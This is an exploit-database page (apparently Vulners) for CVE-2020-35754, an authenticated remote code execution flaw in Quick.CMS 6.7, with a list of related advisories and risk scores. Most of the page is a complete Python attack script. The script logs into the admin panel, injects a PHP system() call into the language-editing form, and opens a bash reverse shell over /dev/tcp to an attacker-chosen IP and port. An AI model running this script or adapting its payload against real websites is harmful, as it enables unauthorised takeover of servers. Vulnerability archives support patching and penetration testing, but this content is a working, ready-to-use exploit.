Vulners
Lucene search
Quick.CMS 6.7 - Remote Code Execution (Authenticated)
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2020-35754 | 28 Jan 202122:39 | – | circl |
 | Opensolution Quick.Cart and Opensolution Quick.Cms Injection Vulnerabilities | 28 Jan 202100:00 | – | cnnvd |
 | CVE-2020-35754 | 28 Jan 202119:26 | – | cve |
 | CVE-2020-35754 | 28 Jan 202119:26 | – | cvelist |
 | CVE-2020-35754 | 28 Jan 202120:15 | – | nvd |
 | CVE-2020-35754 | 28 Jan 202120:15 | – | osv |
 | Quick.CMS 6.7 Remote Code Execution | 29 Jan 202100:00 | – | packetstorm |
 | Code injection | 28 Jan 202120:15 | – | prion |
 | CVE-2020-35754 | 22 May 202517:10 | – | redhatcve |
# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated)
# Date: 2020-12-28
# Exploit Author: mari0x00
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip
# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/
# Version: <= 6.7
# CVE : CVE-2020-35754
#!/usr/bin/python3
import requests
import sys
from termcolor import colored
from time import sleep
print(colored('''###########################################################''',"red"))
print(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',"red"))
print(colored('''###########################################################''',"red"))
print("")
if len(sys.argv) != 6:
print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red")))
print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ [email protected] pass123 192.168.101.101 4444","red")))
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]
#Start session
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
#Authenticate
print((colored("[+] Attempting user login","blue")))
login_data = {
"sEmail": username,
"sPass": password,
"bAcceptLicense": "1",
"iAcceptLicense": "true"
}
login = s.post(url+"admin.php?p=login", login_data, headers=headers)
sleep(0.5)
#Exploit
print((colored("[+] Adding shell command","blue")))
payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //"
shell = {
"sOption": "save",
"Back_end_only": payload
}
exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers)
sleep(1)
#Triggering reverse shell (three times just in case)
print("")
print((colored("[+] Triggering the shell. Go nuts!","green")))
r = s.get(url+"admin.php?p=languages", headers=headers)
sleep(1)
r = s.get(url+"admin.php?p=languages", headers=headers)
sleep(1)
r = s.get(url+"admin.php?p=languages", headers=headers)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jan 2021 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 26.5
CVSS 3.17.2
EPSS0.10458